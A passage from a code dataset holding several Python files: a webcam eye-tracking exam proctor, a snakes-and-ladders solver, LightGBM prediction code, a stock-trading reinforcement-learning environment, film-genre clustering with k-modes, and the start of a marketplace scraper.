_temp_faces_for_compare):\n global path, is_face_compared\n\n if _num_faces == 1:\n _temp_faces_for_compare = (0, 0)\n imgS = cv2.cvtColor(_frame, cv2.COLOR_BGR2RGB)\n faceLocation = face_recognition.face_locations(imgS)\n encodedCurFrame = face_recognition.face_encodings(imgS, faceLocation)\n _temp_faces_for_compare = (faceLocation, encodedCurFrame, True)\n\n return _temp_faces_for_compare\n\n elif _num_faces == 2:\n imgS = cv2.cvtColor(_frame, cv2.COLOR_BGR2RGB)\n faceLocation = face_recognition.face_locations(imgS)\n encodedCurFrame = face_recognition.face_encodings(imgS, faceLocation)\n\n matches = face_recognition.compare_faces((_temp_faces_for_compare[1])[0], encodedCurFrame)\n distance = face_recognition.face_distance((_temp_faces_for_compare[1])[0], encodedCurFrame)\n if distance[0] == 0:\n try:\n distance = distance[1]\n except Exception:\n distance = 0\n else:\n distance = distance[0]\n\n print(distance)\n\n\n s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n f = open(path + filename + s + \".txt\", 'w')\n f.write(\"신원인증 결과 일치할 확률 : {:.2f}% + 7\".format((1-distance)*100))\n f.close()\n\n _temp_faces_for_compare = (None, None, False)\n print(\"*** identification SUCCESS ***\\n\\n\")\n print(\" LOADING . . . \\n\\n\")\n cv2.destroyAllWindows()\n time.sleep(3)\n print(\"*** eyetracking ACTIVATED ***\")\n\n is_face_compared = True\n\n return _temp_faces_for_compare\n\n\n\n\"\"\" Set criteria\n\"\"\"\ndef set_criteria(_direction, _head_direction_sum, _criteria_finished, _direction_ratio, _eye_direction_sum):\n\n global criteria_frame_num, num_frames\n\n _head_direction_criteria = 0\n _eye_direction_criteria = 0\n\n num_frames += 1\n if _direction == \"left\" and (not _criteria_finished):\n _head_direction_sum += (_direction_ratio - 1) * (-1)\n # print(head_direction_sum)\n elif _direction == \"right\" and (not _criteria_finished):\n _head_direction_sum += (_direction_ratio - 1)\n # print(head_direction_sum)\n\n if num_frames == criteria_frame_num:\n _head_direction_criteria = (_head_direction_sum / num_frames)\n print(\"HEAD : {}\".format(_head_direction_criteria))\n _criteria_finished = True\n\n if num_frames == criteria_frame_num:\n _eye_direction_criteria = (_eye_direction_sum / num_frames)\n print(\"EYE : {}\".format(_eye_direction_criteria))\n\n return _head_direction_criteria, _eye_direction_criteria, _criteria_finished, num_frames\n\n\n\ndef warn_eye_direction(_criteria_finished, _gaze_ratio, _eye_direction_criteria, _margin_eye):\n\n global is_time_counting_eye, start_time_eye, cause\n\n # 숫자가 작아질수록 관대\n if _criteria_finished and _gaze_ratio < _eye_direction_criteria - _margin_eye:\n if not is_time_counting_eye:\n start_time_eye = time.time()\n is_time_counting_eye = True\n print(\"시간 계산중...\")\n cause = 2\n #print(\"눈동자 왼쪽으로 벗어남\")\n #print(_gaze_ratio)\n\n # 숫자가 커질수록 관대\n elif _criteria_finished and _gaze_ratio > _eye_direction_criteria + _margin_eye:\n if not is_time_counting_eye:\n start_time_eye = time.time()\n is_time_counting_eye = True\n print(\"시간 계산중...\")\n cause = 1\n #print(\"눈동자 오른쪽으로 벗어남\")\n #print(_gaze_ratio)\n\n else:\n if is_time_counting_eye:\n print(\"종료[e]\")\n duration = time.time() - start_time_eye\n print(\"duration : {}\".format(duration))\n count_cheating(duration, cause)\n is_time_counting_eye = False\n time.sleep(1)\n\n\n\"\"\" Head angle warning algorithm\n\"\"\"\ndef warn_head_direction(_criteria_finished, _head_direction_criteria, _head_direction, _margin_head):\n global start_time_head, is_time_counting_head, cause\n\n # 왼쪽 바라볼때\n if _criteria_finished and _head_direction_criteria < 0:\n if _head_direction[0] == \"left\" and _head_direction[1] > 1 - _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 4\n #print(\"고개 왼쪽으로 벗어남\")\n #print(_head_direction)\n\n elif _head_direction[0] == \"right\" and _head_direction[1] > 1 + _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 3\n #print(\"고개 오른쪽으로 벗어남\")\n #print(_head_direction)\n\n else:\n if is_time_counting_head:\n print(\"종료[h]\")\n duration = time.time() - start_time_head\n print(\"duration : {}\".format(duration))\n count_cheating(duration, cause)\n is_time_counting_head = False\n time.sleep(1)\n\n # 오른쪽 바라볼때\n if _criteria_finished and _head_direction_criteria >= 0:\n if _head_direction[0] == \"left\" and _head_direction[1] > 1 - _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 4\n #print(\"고개 왼쪽으로 벗어남\")\n #print(_head_direction)\n\n elif _head_direction[0] == \"right\" and _head_direction[1] > 1 + _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 3\n #print(\"고개 오른쪽으로 벗어남\")\n #print(_head_direction)\n\n else:\n if is_time_counting_head:\n print(\"종료[h]\")\n duration = time.time() - start_time_head\n print(\"duration : {}\".format(duration))\n count_cheating(duration, cause)\n is_time_counting_head = False\n time.sleep(1)\n\n\n\n\"\"\" count the cheating frequency\n\"\"\"\ndef count_cheating(_duration, _cause):\n global short_cheating_count, long_cheating_count, warning_count, \\\n max_long_cheating, max_short_cheating, criteria_time, filename, path\n\n if _duration < criteria_time:\n short_cheating_count += 1\n\n elif _duration >= criteria_time:\n long_cheating_count += 1\n\n\n if short_cheating_count == max_short_cheating:\n s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n f = open(path + filename + s + \".txt\", 'w')\n warning_count += 1\n f.write(\"짧은 경고 5회 누적 + \" + str(_cause))\n f.close()\n print(\"짧은 경고 5회 누적\")\n short_cheating_count = 0\n\n if long_cheating_count == max_long_cheating:\n print(\"긴 경고 1회 누적!\")\n s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n f = open(path + filename + s + \".txt\", 'w')\n warning_count += 1\n f.write(\"긴 경고 1회 누적 + \" + str(_cause))\n f.close()\n long_cheating_count = 0\n\n\n\"\"\" detect no faces warning\n\"\"\"\ndef warn_no_face(_duration):\n global no_face_time, max_long_cheating, max_short_cheating, warning_count, filename, path\n\n if _duration > no_face_time:\n print(\"얼굴 감지 안됨 경고\")\n s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n f = open(path + filename + s + \".txt\", 'w')\n warning_count += 1\n f.write(\"{:.1f} 초간 얼굴 감지 안됨 경고 + 5\".format(_duration))\n f.close()\n\n\"\"\" detect no faces warning\n\"\"\"\ndef warn_many_faces(_num_faces, _left_frame):\n global no_face_time, max_long_cheating, max_short_cheating, warning_count, filename, path\n\n if _num_faces >= 2:\n s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n f = open(path + filename + s + \".txt\", 'w')\n f.write(\"2명 이상 얼굴 감지됨 + 7\")\n print(\"2명 이상 얼굴 감지됨\")\n f.close()\n return 0\n\n else:\n return _left_frame\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\" # MAIN FUNCTION # \"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\ndef main():\n global num_frames, is_face_compared\n\n cap = cv2.VideoCapture(0)\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n # 얼굴 인식 활성화 여부 확인\n Activated = False\n\n # 얼굴 인식 위한 변수\n temp_faces_for_compare = (None, None, Activated)\n start_time_face = 0\n\n # 초반 고개/눈 방향 기준 설정 위한 변수들\n head_direction_sum = 0\n eye_direction_sum = 0\n head_direction_criteria = 0\n eye_direction_criteria = 0\n\n # 초반 고개/눈 방향 기준 설정 여부 확인\n criteria_finished = False\n\n # 눈 방향 탐지 위한 마진 (낮을수록 엄격하게 탐지)\n margin_eye = 2.3\n margin_head = 0.7\n\n # 얼굴 여러개 위한 변수\n left_frame = 100\n\n while True:\n _, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = detector(gray)\n num_faces = 0\n\n # 얼굴 인식 부분\n for face in faces:\n num_faces += 1\n landmarks = predictor(gray, face)\n\n # 신원 인증 부분 (is_face_compared 안되어있으면 신원 인증 진행)\n if not is_face_compared and not temp_faces_for_compare[2]:\n temp_faces_for_compare = (0, 0, True)\n\n # 일정 시간 이상 얼굴 탐지 안되면 경고\n duration = time.time() - start_time_face\n start_time_face = time.time()\n\n if not num_frames == 0:\n warn_no_face(duration)\n\n \"\"\"\n # 눈을 추적하며 깜박임 감지\n if get_blinking_ratio(landmarks) > 3.7: # 숫자가 높아질수록 엄격하게 감지\n \"\"\"\n\n # 보는 방향 감지\n # 오른쪽 -> 커진다 / 왼쪽 -> 작아진다\n gaze_ratio_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41], landmarks, gray, frame)\n gaze_ratio_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47], landmarks, gray, frame)\n gaze_ratio = (gaze_ratio_left_eye + gaze_ratio_right_eye) / 2\n eye_direction_sum += gaze_ratio\n #print(gaze_ratio)\n\n # 고개 돌리는 방향 감지\n head_direction = get_head_angle_ratio([27, 28, 29, 30, 31, 32, 33, 34, 35], landmarks, frame)\n direction = head_direction[0]\n direction_ratio = head_direction[1]\n\n # 눈동자가 인가된 범위를 벗어나면 경고\n warn_eye_direction(criteria_finished, gaze_ratio, eye_direction_criteria, margin_eye)\n\n # 고개가 인가된 범위를 벗어나면 경고\n warn_head_direction(criteria_finished, head_direction_criteria, head_direction, margin_head)\n\n # 웹캠에 감지된 얼굴이 2개 이상일 경우 경고\n if is_face_compared and left_frame > 100:\n left_frame = warn_many_faces(num_faces, left_frame)\n left_frame += 1\n\n # 최초 100프레임동안 고개, 눈동자 기준설정\n if not criteria_finished and is_face_compared:\n head_direction_criteria, eye_direction_criteria, criteria_finished, num_frames \\\n = set_criteria(direction, head_direction_sum,\n criteria_finished, direction_ratio, eye_direction_sum)\n\n # 얼굴을 통한 신원확인\n if temp_faces_for_compare[2]:\n temp_faces_for_compare = compare_faces(frame, num_faces, temp_faces_for_compare)\n\n\n\n # Print ont the screen\n if temp_faces_for_compare[2]:\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n else:\n key = cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n # ESC 입력시 프로그램 종료\n if key == 27:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()\n\n# 바로 신원인식하면 에러뜸","sub_path":"eyetracking2/practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":22180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33659148","text":"if __name__ == '__main__':\n for _ in range(int(input())):\n board = [i for i in range(0, 101)]\n for _ in range(int(input())):\n pos_ini, pos_end = list(map(int, input().split()))\n board[pos_ini] = pos_end\n for _ in range(int(input())):\n pos_ini, pos_end = list(map(int, input().split()))\n board[pos_ini] = pos_end\n\n opened = [1]\n path = {1: ()}\n while opened:\n cur = opened.pop()\n p = path[cur] + (cur,)\n for nex in range(cur + 1, cur + 7):\n if nex > 100:\n break\n nex = board[nex]\n if nex not in path or len(path[nex]) > len(p):\n opened.append(nex)\n path[nex] = p\n #for i in path:\n # print(i, \"can be reached in {} through {}\".format(len(path[i]), path[i]))\n if 100 not in path:\n print(-1)\n else:\n print(len(path[100]))\n","sub_path":"HackerRank/Algorithms/GraphTheory/snakesAndLadders/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275785049","text":"def inserts(nums,dis,num):\n out = []\n if(len(nums)==0):out.append([dis,num])\n else:\n for i in range(len(nums)):\n if(nums[i][0]>dis and i==0):\n out.append([dis,num])\n out.append(nums[i])\n dis=0\n elif( (i=dis)\n or ( i==len(nums)-1 and dis!=0 ) ):\n out.append(nums[i])\n out.append([dis,num])\n dis=0\n else:\n out.append(nums[i])\n return out\n\nnums = eval(input())\nk = int(input())\nout = []\nfor i in nums:\n out = inserts(out,(i[0]**2+i[1]**2),i)\nprint(out[k-1][1])","sub_path":"Code/CodeRecords/2504/60642/292815.py","file_name":"292815.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255420093","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 21 09:52:40 2017\r\nget output preditions for the test data\r\n@author: Li Ruosong\r\n\"\"\"\r\nprint (\"Train test and validation sets\")\r\n\r\ntrain_label = train['target'].values \r\ntrain = train.drop(['target'], axis=1)\r\n\r\n\r\n\r\n\r\nids = test['id'].values\r\ntest = test.drop(['id'], axis=1)\r\n\r\nfor col in train.columns: \r\n train[col] = train[col].astype('category')\r\n test[col] = test[col].astype('category')\r\n\r\nd_train=lgb.Dataset(train,train_label)\r\nd_val=lgb.Dataset(train.iloc[5000000:],train_label[5000000:])\r\n#transfer features into category type\r\n\r\n \r\n\r\n\r\nparams = {\r\n 'objective': 'binary',\r\n \r\n 'boosting': 'gbdt',\r\n 'learning_rate':0.22,\r\n 'lamda_l2': 0.0005,\r\n 'verbose': 0,\r\n 'num_leaves': 3000,\r\n 'bagging_fraction': 0.95,\r\n 'bagging_freq': 1,\r\n 'bagging_seed': 1,\r\n 'feature_fraction': 0.9,\r\n 'feature_fraction_seed': 1,\r\n 'max_bin': 5000,\r\n 'max_depth': 30,\r\n 'num_rounds': 200,\r\n 'metric' : 'auc'\r\n }\r\n\r\n#%time \r\nmodel_f1 = lgb.train(params, train_set=d_train, valid_sets=d_val,verbose_eval=1)\r\n\r\nm1_feature_importance=pd.DataFrame(model_f1.feature_importance(),index=train.columns)\r\n\r\nparams = {\r\n 'objective': 'binary',\r\n \r\n 'boosting': 'dart',\r\n 'learning_rate':0.22,\r\n 'lamda_l2': 0.0005,\r\n 'verbose': 0,\r\n 'num_leaves': 800,\r\n 'bagging_fraction': 0.95,\r\n 'bagging_freq': 1,\r\n 'bagging_seed': 1,\r\n 'feature_fraction': 0.9,\r\n 'feature_fraction_seed': 1,\r\n 'max_bin': 50,\r\n 'max_depth': 25,\r\n 'num_rounds': 200,\r\n 'metric' : 'auc'\r\n }\r\n\r\n#%time \r\nmodel_f2 = lgb.train(params, train_set=d_train, valid_sets=d_val, verbose_eval=5)\r\nm2_feature_importance=pd.DataFrame(model_f2.feature_importance(),index=train.columns)\r\n###\r\n'''\r\nparams = {\r\n 'objective': 'binary',\r\n \r\n 'boosting': 'rf',\r\n 'learning_rate':0.22,\r\n 'lamda_l2': 0.0005,\r\n 'verbose': 0,\r\n 'num_leaves': 800,\r\n 'bagging_fraction': 0.8,\r\n 'bagging_freq': 1,\r\n 'bagging_seed': 1,\r\n 'feature_fraction': 0.85,\r\n 'feature_fraction_seed': 1,\r\n 'max_bin': 50,\r\n 'max_depth': 25,\r\n 'num_rounds': 150,\r\n 'metric' : 'auc'\r\n }\r\n\r\n#%time \r\nmodel_f3 = lgb.train(params, train_set=d_train,valid_sets=d_val, verbose_eval=5)\r\nm3_feature_importance=pd.DataFrame(model_f3.feature_importance(),index=train.columns)\r\n###\r\nparams = {\r\n 'objective': 'binary',\r\n \r\n 'boosting': 'goss',\r\n 'learning_rate':0.15,\r\n 'lamda_l2': 0.0005,\r\n 'verbose': 0,\r\n 'num_leaves': 800,\r\n \r\n 'feature_fraction': 0.9,\r\n 'feature_fraction_seed': 1,\r\n 'max_bin': 50,\r\n 'max_depth': 25,\r\n 'num_rounds': 200,\r\n 'metric' : 'auc'\r\n }\r\n\r\n#%time \r\nmodel_f4 = lgb.train(params, train_set=d_train,valid_sets=d_val, verbose_eval=5)\r\nm4_feature_importance=pd.DataFrame(model_f4.feature_importance(),index=train.columns)\r\nprint('Making predictions')\r\n'''\r\np_test_1 = model_f1.predict(test)\r\n\r\np_test_2 = model_f2.predict(test)\r\n'''\r\np_test_3 = model_f3.predict(X_test)\r\np_test_4 = model_f4.predict(X_test)\r\n'''\r\np_test_avg = np.mean([p_test_1, p_test_2], axis = 0)\r\n\r\n\r\nprint('Done making predictions')\r\n\r\nprint ('Saving predictions Model model of gbdt')\r\n\r\nsubm = pd.DataFrame()\r\nsubm['id'] = ids\r\nsubm['target'] = p_test_avg\r\nsubm.to_csv(data_path + 'submission_lgb_1.3.csv.gz', compression = 'gzip', index=False, float_format = '%.5f')\r\n\r\nprint('Done!')\r\n","sub_path":"output_prediction.py","file_name":"output_prediction.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483623959","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport enum\nimport numpy as np\nimport random\n\nrandom.seed(0)\n\nDEFAULT_COMMISSION_PERC = 0.00\nDEFAULT_WINDOW_SIZE = 300\nPAGE = 0\nTRADIN_INTERVAL = 100\nSHOULD_USE_INTERVAL = False\n\nclass Actions(enum.Enum):\n Skip = 0\n Buy = 1\n Close = 2\n\nclass StocksEnv(gym.Env):\n metadata = {'render.modes': ['human']}\n\n def __init__(self, prices, test=False):\n\n self._test_env = test\n self._prices = prices\n self._initial_offset = PAGE * TRADIN_INTERVAL#random.randint(DEFAULT_WINDOW_SIZE,len(self._prices) - 1)\n self._offset = self._initial_offset\n self._window_size = DEFAULT_WINDOW_SIZE\n self._commission_perc = DEFAULT_COMMISSION_PERC \n\n self.have_position = False\n self.open_price = 0\n\n self.action_space = gym.spaces.Discrete(n=len(Actions))\n self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(DEFAULT_WINDOW_SIZE,1), dtype=np.float32)\n\n def reset(self):\n self._initial_offset = PAGE * TRADIN_INTERVAL #random.randint(DEFAULT_WINDOW_SIZE,len(self._prices) - 1)\n self._offset = self._initial_offset \n self.have_position = False\n return self.get_state(self._offset,self._window_size + 1)\n\n def get_state(self, t, n):\n d = t - n + 1\n block = self._prices[d : t + 1] if d >= 0 else -d * [self._prices[0]] + self._prices[0 : t + 1]\n res = []\n\n for i in range(n - 1):\n try:\n res.append(((block[i + 1] - block[i]) / block[i]) * 100 )\n except:\n res.append(0)\n return np.array(res)\n\n def _cur_close(self):\n return self._prices[self._offset]\n\n def _set_seed(self,seed):\n random.seed(seed)\n\n def take_action(self,action):\n reward = 0.0\n done = False\n close = self._cur_close()\n if action == Actions.Buy and not self.have_position:\n self.have_position = True\n self.open_price = close\n reward -= self._commission_perc\n elif action == Actions.Close and self.have_position:\n reward -= self._commission_perc\n reward += 100.0 * (close - self.open_price) / self.open_price\n self.have_position = False\n self.open_price = 0.0\n\n self._offset += 1\n done = self._offset >= len(self._prices) #or (SHOULD_USE_INTERVAL and self._offset >= self._initial_offset + TRADIN_INTERVAL)\n\n if self._test_env and done:\n print(\"Total percentage change \" ,((self._prices[-1] - self._prices[self._initial_offset]) / self._prices[self._initial_offset]) * 100)\n\n # if done:\n # print(\"Reward before :\" + str(reward))\n # reward -= ((self._prices[self._offset] - self._prices[self._initial_offset]) / self._prices[self._initial_offset]) * 100\n # print(\"Reward after :\" + str(reward))\n\n return reward, done\n\n def step(self, action_idx):\n action = Actions(action_idx)\n reward, done = self.take_action(action)\n obs = self.get_state(self._offset,self._window_size + 1)\n info = { \"offset\": self._offset}\n return obs, reward, done, info\n\n def render(self, mode='human', close=False):\n pass\n\n def close(self):\n pass\n\n def seed(self, seed=None):\n self.np_random, seed1 = seeding.np_random(seed)\n seed2 = seeding.hash_seed(seed1 + 1) % 2 ** 31\n return [seed1, seed2]\n\n","sub_path":"esba-pytorch-reinforcement/environ.py","file_name":"environ.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542752773","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager\nfont = font_manager.FontProperties(fname=\"C:\\\\Windows\\\\Fonts\\\\AdobeFanHeitiStd-Bold.otf\",size='20')\nfrom kmodes.kmodes import KModes\nimport datetime\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef main (num, source_data):\n count=0\n all_count=[]\n month_count=[]\n all_data=[]\n data_list=[]\n data_num=[]\n # print(len(source_data[\"類型\"]))\n for i in range(len(source_data[\"類型\"])):\n tmp=datetime.datetime.strptime(source_data[\"上映日期\"][i],\"%Y/%m/%d\")\n all_data.append(source_data[\"類型\"][i].split('、')) \n all_count.append(i)\n if(tmp.month==num):\n data_list.append(source_data[\"類型\"][i].split('、')) \n count+=1 \n month_count.append(i)\n for i in range(len(data_list)):\n for j in (data_list[i]):\n data_num.append(j) \n# from collections import Counter\n# print(Counter(data_num))\n labels=list(set(data_num)) \n data_count=np.zeros(len(labels))\n for i in (data_num):\n for j in range(len(data_count)):\n if i in list(set(data_num))[j]:\n data_count[j]+=1\n return data_count, labels, all_data, count, data_list, month_count, all_count\n\n# data_count, labels, all_data=main(10)\n\ndef kmode(source_data, all_data, data_list, month_count, all_count, clusters_num, init, n_init, verbose, all_option=False):\n center_list=[]\n if all_option==False:\n revenue = source_data.iloc[month_count[0]:month_count[-1]] \n revenue.pop(\"上映日期\")\n revenue.pop(\"出品\")\n revenue.pop(\"google trend\")\n revenue.pop(\"導演\")\n revenue.pop(\"演員1\")\n revenue.pop(\"演員2\")\n revenue.pop(\"演員3\")\n revenue.pop(\"演員4\")\n revenue.pop(\"編劇\")\n revenue.pop(\"喜歡\")\n revenue.pop(\"不喜歡\")\n revenue.pop(\"製片預算\")\n revenue=revenue.nlargest(7, [\"累計銷售金額\"]) \n print(revenue.to_string(index=False))\n for i in (data_list):\n if len(i)!=5:\n a=5-len(i) \n for j in range(a): \n i.append(\"no\") \n data_array=np.array(data_list)\n else:\n revenue = source_data.iloc[all_count[0]:all_count[-1]]\n revenue.pop(\"上映日期\")\n revenue.pop(\"出品\")\n revenue.pop(\"google trend\")\n revenue.pop(\"導演\")\n revenue.pop(\"演員1\")\n revenue.pop(\"演員2\")\n revenue.pop(\"演員3\")\n revenue.pop(\"演員4\")\n revenue.pop(\"編劇\")\n revenue.pop(\"喜歡\")\n revenue.pop(\"不喜歡\")\n revenue.pop(\"製片預算\")\n revenue=revenue.nlargest(7, [\"累計銷售金額\"]) \n print(revenue.to_string(index=False))\n for i in (all_data):\n if len(i)!=5:\n a=5-len(i) \n for j in range(a): \n i.append(\"no\")\n data_array=np.array(all_data) \n\n km = KModes(n_clusters=clusters_num, init=init, n_init=5, verbose=1)\n clusters = km.fit_predict(data_array)\n \n \"\"\"\n Print the cluster centroids\n \"\"\" \n# print(km.cluster_centroids_)\n for i in range(clusters_num):\n if km.cluster_centroids_[i][1]==\"no\":\n center_list.append(km.cluster_centroids_[i][0])\n else:\n center_list.append(km.cluster_centroids_[i][0]+km.cluster_centroids_[i][1])\n\n return center_list, clusters\n\n\n# center_list, clusters=kmode(all_data, clusters_num=7, init='Huang', n_init=5, verbose=1) \n\n\ndef pie(num, source_data, all_option=True):\n if all_option==False:\n for ii in range(num):\n if ii==0:\n pass\n else: \n data_count, labels, all_data, count, data_list, month_count, all_count=main(ii,source_data=source_data)\n print(\"month_\"+str(ii)+\":\")\n print(\"movie number:\",count)\n print(\"class number:\",data_count)\n center_list, clusters=kmode(source_data,all_data, data_list, month_count, all_count, clusters_num=7, init='Huang', n_init=5, verbose=1, all_option=False) \n print(\"cluster center:\",center_list)\n print(\"class:\",clusters)\n check_labels=np.zeros(len(center_list))\n for i in range(len(center_list)):\n check_labels[i]=i\n print(check_labels) \n\n # from collections import Counter\n # print(Counter(clusters))\n\n plot_data=np.zeros(len(center_list))\n for i in clusters:\n for j in range(len(check_labels)):\n # print(check_labels[j])\n if i == check_labels[j]:\n plot_data[i]+=1 \n print(plot_data) \n\n plt.figure(figsize=(12,18)) # 顯示圖框架大小\n# labels = check_labels # 製作圓餅圖的類別標籤\n labels = center_list\n # separeted = (0, 0, 0.3, 0, 0.3) # 依據類別數量,分別設定要突出的區塊\n # size = accident[\"count\"] # 製作圓餅圖的數值來源\n\n patches,l_text,p_text =plt.pie(plot_data, # 數值\n labels = labels, # 標籤\n autopct = \"%1.1f%%\", # 將數值百分比並留到小數點一位\n # explode = separeted, # 設定分隔的區塊位置\n pctdistance = 0.6, # 數字距圓心的距離\n textprops = {\"fontsize\" : 24}, # 文字大小\n shadow=True) # 設定陰影 \n \n \n for t in l_text: \n t.set_fontproperties(font)\n month=[\"0\",\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\"]\n plt.axis('equal') # 使圓餅圖比例相��\n plt.title(\"Film Genre Statistics of \"+ month[ii], {\"fontsize\" : 24}) # 設定標題及其文字大小\n plt.legend(loc = \"best\", prop=font) # 設定圖例及其位置為最佳\n# plt.savefig(\"Film Genre Statistics of \"+ month[ii]+\".jpg\", # 儲存圖檔\n# bbox_inches='tight', # 去除座標軸占用的空間\n# pad_inches=0.0) # 去除所有白邊\n# plt.close() # 關閉圖表\n else:\n data_count, labels, all_data, count, data_list, month_count, all_count=main(0,source_data=source_data)\n print(\"All:\")\n# print(\"movie number:\",count)\n# print(\"class number:\",data_count) \n\n center_list, clusters=kmode(source_data,all_data, data_list, month_count, all_count, clusters_num=7, init='Huang', n_init=5, verbose=1, all_option=True) \n print(\"cluster center:\",center_list)\n print(\"class:\",clusters)\n print(len(clusters))\n check_labels=np.zeros(len(center_list))\n for i in range(len(center_list)):\n check_labels[i]=i\n print(check_labels) \n dataframe=pd.DataFrame(clusters, columns=['新類別'])\n# print(dataframe)\n class_data=pd.concat([source_data,dataframe],axis=1, ignore_index=False)\n# print(class_data)\n plot_data=np.zeros(len(center_list))\n for i in clusters:\n for j in range(len(check_labels)):\n # print(check_labels[j])\n if i == check_labels[j]:\n plot_data[i]+=1 \n# print(plot_data) \n\n plt.figure(figsize=(12,18)) # 顯示圖框架大小\n# labels = check_labels # 製作圓餅圖的類別標籤\n labels = center_list\n # separeted = (0, 0, 0.3, 0, 0.3) # 依據類別數量,分別設定要突出的區塊\n # size = accident[\"count\"] # 製作圓餅圖的數值來源\n\n patches,l_text,p_text =plt.pie(plot_data, # 數值\n labels = labels, # 標籤\n autopct = \"%1.1f%%\", # 將數值百分比並留到小數點一位\n # explode = separeted, # 設定分隔的區塊位置\n pctdistance = 0.6, # 數字距圓心的距離\n textprops = {\"fontsize\" : 24}, # 文字大小\n shadow=True\n ) # 設定陰影\n\n for t in l_text: \n t.set_fontproperties(font)\n plt.axis('equal') # 使圓餅圖比例相等\n plt.title(\"Annual Film Genre Statistics\", {\"fontsize\" : 24}) # 設定標題及其文字大小 \n plt.legend(loc = \"best\",prop=font) # 設定圖例及其位置為最佳\n plt.show()\n# plt.savefig(\"Annual Film Genre Statistics.jpg\", # 儲存圖檔\n# bbox_inches='tight', # 去除座標軸占用的空間\n# pad_inches=0.0) # 去除所有白邊\n# plt.close() # 關閉圖表\n return class_data\n\n# class_data=pie(num=11, all_option=True)","sub_path":"class_method.py","file_name":"class_method.py","file_ext":"py","file_size_in_byte":9690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"147080909","text":"import asyncio\nimport aiohttp\nfrom datetime import date, timedelta\nfrom bs4 import BeautifulSoup as BS\nimport re\nimport pickle\nimport os\n\n\n\"\"\"\nVariables\n\"\"\"\nURL = \"https://market.kz\"\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'\n}\n\"\"\"\nFor sitemap\n\"\"\"\ncategories = (\n ('detyam', 'Детям'),\n ('zhivotnye', 'Животные'),\n ('elektronika', 'Электроника'),\n ('dom-dacha', 'Для дома и дачи'),\n ('uslugi', 'Услуги'),\n ('hobby-otdyh', 'Хобби и отдых'),\n ('lichnye-vezchi', 'Личные вещи'),\n ('rabota', 'Работа'),\n ('biznes', 'Для бизнеса'),\n ('ruchnaya-rabota', 'Ручная работа'),\n ('transport', 'Транспорт'),\n ('nedvizhimost', 'Недвижимость')\n)\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n\nhours = [str(i).zfill(2) for i in range(0, 1)]\ntoday = date.today()\ndates = [(today - timedelta(days=x)).strftime('%Y/%m/%d') for x in range(0, 30)]\n\nDATEPATTERN = re.compile(r'(\\d+)/(\\d+)/(\\d+)')\nNUMERICPATTERN = re.compile(r'\\D')\n\n\"\"\"\nGlobal var\n\"\"\"\nusers_list = set()\n\"\"\"\nuser type:\n{\n name: username\n phones: [phones]\n location: location\n}\n\"\"\"\nusers_info = [] # not used\n\n\ndef url_maker(category, dt, hour):\n return \"/\".join([URL, 'sitemap', category, dt, hour]) + \"/\"\n\n\ndef url_advert(ad):\n return \"\".join([URL, ad])\n\n\ndef date_snake(dt):\n d, m, y = DATEPATTERN.match(dt).groups()\n return \"{}_{}_{}\".format(d, m, y)\n\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n return await response.text()\n\n\nasync def word_parser(url, words):\n async with aiohttp.ClientSession(headers=headers) as session:\n html = await fetch(session, url)\n advert_soup = BS(html, \"html.parser\")\n item = advert_soup.find('div', {'id': 'content'})\n item_title = item.find('h1', {'itemprop': 'name'}).text\n item_text = 